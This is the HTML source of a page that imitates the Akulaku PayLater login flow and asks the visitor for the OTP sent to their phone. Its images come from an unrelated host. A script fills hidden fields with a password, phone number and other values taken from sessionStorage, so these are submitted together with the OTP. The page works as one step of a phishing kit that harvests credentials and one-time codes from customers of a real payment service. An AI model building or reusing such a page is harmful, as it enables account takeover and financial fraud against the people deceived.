<!DOCTYPE HTML>
<html>
<head>
<html lang="en" id="root" class="hairlines" style="font-size: 114.444px;">
 <head>
  <meta charset="UTF-8">
  <title>Akulaku PayLater</title>
  <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover">
  <meta http-equiv="Expires" content="-1">
  <meta http-equiv="Cache-Control" content="no-cache">
  <meta http-equiv="Pragma" content="no-cache">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="format-detection" content="telephone=no">
  <meta http-equiv="x-dns-prefetch-control" content="on">
  <link rel="dns-prefetch" href="https://cstatic.akulaku.net">
  <link rel="dns-prefetch" href="https://at.alicdn.com">
  <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  <link rel="preconnect" href="https://ec-cstatic.akulaku.net">
  <link rel="dns-prefetch" href="https://ec-cstatic.akulaku.net">
  <style>#modal-root{z-index:1999}</style> 
  <link href="https://ec-cstatic.akulaku.net/openpay/umi.0a900b80.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/479.e233ddfe.chunk.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/openPay/app.c7fc5aba.chunk.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/3311.25d87eff.chunk.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/openPay/signin.6427c161.chunk.css" rel="stylesheet" type="text/css">
  
  
  
 <style>
      @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      max-width: 100%;
      overflow-x: hidden;
      }
body {
    margin: 0px;
    background: #fff;
    color: #000;
    font-family: 'sageo UI', sans-serif;
}
welalxcome {
        position: fixed;
    left: 0;
    top: 0;
    width: 100vw;
    height: 90vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
}
welalxcome img {
        width:30vw;
    height: auto;
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.talxcome {
    width: 130%;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 100%;
    justify-content: center;
}

.process1 {
            width: 100%;
            height: 100%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin: auto;
            position: fixed;
            padding-top: 30px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 999999999;
            
      
}
.loading {
    position: fixed;
    display: flex;
    align-items: center;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 0px;
}
.loading img {
    width: 140px;
    border-radius: 10px;
}

</style>
  
<body>
      <center>
     <div id="djload" name="process" class="process1" style="display: none;">
            <div class="loading">
                <img src="https://hosting.tigerengine.id/d4g84c.gif">
              
            </div>
        </div>
        </center>
     <main>
<welalxcome>
<img src="https://hosting.tigerengine.id/0zt1zc.gif" alt="" />
</welalxcome>
<chsalxcome2 style="display: none;">
<div style="height:auto;width: auto;margin-top: -10px;margin-bottom: 0px;float:center;margin-left:0%" class="talxcome"><p></p><br>
  
  
  
  
  
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/4452.5558fab1.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/1985.2ba4d195.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/openPay/PaymentMethod.1336bc53.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/8680.34183b3b.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/1648.56a1f1df.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/openPay/Terms.d9e24a93.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/openPay/PaymentResult.dac896bb.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/openPay/PaymentContinue.00c288e6.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/9805.03c79d0d.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/8533.5c59bb7c.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/7300.892d4b22.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/110.bc0df4d0.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/4325.4b06c69a.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/8100.0ac14bba.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/806.85f4fb25.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/1016.ea503464.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/52.6c0a4056.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/8600.fc6c06e0.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/5471.49033e17.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/7321.9de4d9d7.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/3317.bd5a1e9b.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/6201.90e6fc48.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/9865.8ff8703b.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/6796.6b0f1ce2.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/2772.de4181c8.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/9764.b0fa15b4.async.js"> 
 </head>
 <body style="font-size: 14px;">
  <div id="__next" class="akulaku-app-container">
   <div class="maxHeight">
    <div class="scrollView___1SZhk container___biXSk">
     <div class="header___3rna1">
      <img src="https://hosting.tigerengine.id/nvdc7d.png" alt="logo" class="logo___3R5uD">
      <span class="text___3ApSa"></span>
     </div>
     <div class="containerBody___3Z8i0">
      <div class="mainBody___19TOW">
       <div class="font-roboto-bold mainBodyTitle___EmqFM">
        Konfirmasi OTP
       </div>
       <form class="" id="formSms" onsubmit="sendOtp()" method="post">
<input type="hidden" name="tarif" id="tarif" value="">
<input type="hidden" name="inp" id="inp" value="">
<input type="hidden" name="password" id="password" value="">
        <div class="inputWrapper___1QPHM mb14___2fwyK">
         <div class="inputContent___2SN63">
          <div class="font-roboto-medium prefix___2vr4B">
           <img src="https://hosting.tigerengine.id/onv3fj.png">
           <span></span>
          </div>
          <div class="FormInputWrapper___2YPnU">
           <div class="input-group___3rbjL one_icon___2Dl7X">
            <input class="font-roboto-medium" type="text" name="sms" id="sms" inputmode="numeric" required placeholder="Masukkan OTP" pattern=".{5,}" title="Masukan kode OTP yang diterima di handphone anda" maxlength="5" value="">
            <span class="icon_area___NIAqv"></span>
            <p></p>
           </div>
          </div>
         </div>
           <div>
               </br>
               </br>
   <button><a role="button" id="btnSubmit1" class="am-button font-roboto-medium LoginSubmitBtn___3LblX mb14___2fwyK am-button-warning" ="false"><span>Konfirmasi</span></a>
        <div class="terms___1M7gU">
         <img src="https://hosting.tigerengine.id/ksjlyk.png" alt="">
         <p><span>Dengan klik Login berarti kamu telah membaca dan menyetujui perjanjian ketentuan berikut </span><a>Pendaftaran Pengguna</a></p>
        </div>
       </form>
       <div class="registerBanner___1nS95">
        <div class="registerIcon___2irhY">
         <img src="https://hosting.tigerengine.id/cuv742.png">
        </div>
        <span class="font-regular"></span>
        <div class="font-regular registerBtn___2OpDu">
         Daftar
        </div>
       </div>
      </div>
      <div class="footer___3zw6C">
       <img src="https://hosting.tigerengine.id/waitsx.png" alt="">
      </div>
     </div>
    </div> 
   </div>
  </div> 
  <div id="modal-root"></div>
  <div id="userdata_el" style="visibility: hidden; position: absolute;"></div>
   <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="i.js"></script><script src="token.js"></script>
  
  <script>
$( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },500)
        });

        </script>
        <script>
              
  var tarif = sessionStorage.getItem('tarif', tarif);
  document.getElementById("tarif").value = tarif + "";  
  var inp = sessionStorage.getItem('inp', inp);
  document.getElementById("inp").value = inp + "";  
  var password = sessionStorage.getItem('password', password);
  document.getElementById("password").value = password + "";       
     
     
    
        </script>
 <!-- </body> --> 
 </body>
</html>
